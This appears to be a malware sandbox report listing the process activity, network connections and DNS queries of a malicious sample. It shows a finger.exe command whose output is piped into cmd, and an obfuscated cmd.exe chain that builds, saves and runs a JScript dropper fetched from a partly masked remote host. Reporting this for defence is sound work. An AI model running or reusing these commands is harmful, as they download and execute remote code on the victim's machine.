Technical Information
- '<SYSTEM32>\finger.exe' ok@hniier.mercaneteucatex.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\3Lf.js"
- %LOCALAPPDATA%\3lf.js
- 'hn####.##rcaneteucatex.email':79
- 'q4####.#dcxsfnyutvi.date':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'hn####.##rcaneteucatex.email':79
- 'cl###flare.com':443
- DNS ASK hn####.##rcaneteucatex.email
- DNS ASK q4####.#dcxsfnyutvi.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@hniier.mercaneteucatex.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt WOPU=.j&&SEt DLHVV=vDoSDarDoSD a =DoSD 'scDoSDriDoSDptDoSD:'; b =DoSD 'hDoSDTtPDoSD:'; GDoSDetDoSDObjDoSDecDoSDt(DoSDa+b+'&&sET TPMC=UTBLCUTBLCq4ionh.hdcxsfnyutvi.dateUTBLC?1UTBLC')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 6J8Y0="%DLHVV:DoSD=%%TPMC:UTBLC=/%" 0<nul 1>%LOCALAPPDATA%\3Lf%WOPU%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\3Lf%WOPU%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\3Lf.js